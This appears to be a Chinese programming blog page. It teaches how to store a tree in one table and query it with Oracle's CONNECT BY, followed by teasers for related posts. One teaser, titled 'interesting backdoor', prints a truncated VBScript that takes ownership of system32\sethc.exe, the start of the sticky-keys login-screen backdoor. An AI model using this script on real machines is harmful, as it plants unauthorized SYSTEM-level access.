用一張表存一張樹結構
表結構
支 葉
mastertype subtype
0 01
0 02
0 03
01 0101
01 0102
01 0103
02 0201
02 0202
02 0203
用oracle直接查詢
select level||'層' as 層,lpad('',level*5)||subtype,mastertype,subtype
from lqshdgslbrelation start with mastertype='01'
connect by prior mastertype = subtype
能查到結構
有意思的後門
dim obj,success set obj createobject wscript.shell success obj.run cmd c takeown f systemroot system32 sethc.exe 0,true success obj.run cmd c echo y c...
有意思的number format
申明 這是個人原創,在cnblogs上也有,都是自己寫的所以放原創了。number format number,decimals,decimalpoint,separator 有四個引數,第乙個和第二個引數是必須的,第三個和第四個是可選項。但實際測試中第三個和第四個這兩個引數必須同時存在,也就是要麼...
有意思的遞迴
先來乙個入門的 上初中學習數列求和什麼的時候我們就學過高斯的計算1到100的自然數的和的經典課文,那麼如果我們現在用程式的話該怎麼來做呢?自然是迴圈來做這件事。如果不用迴圈怎麼做呢?def sum first,end if end 1 return first elif end 1 return s...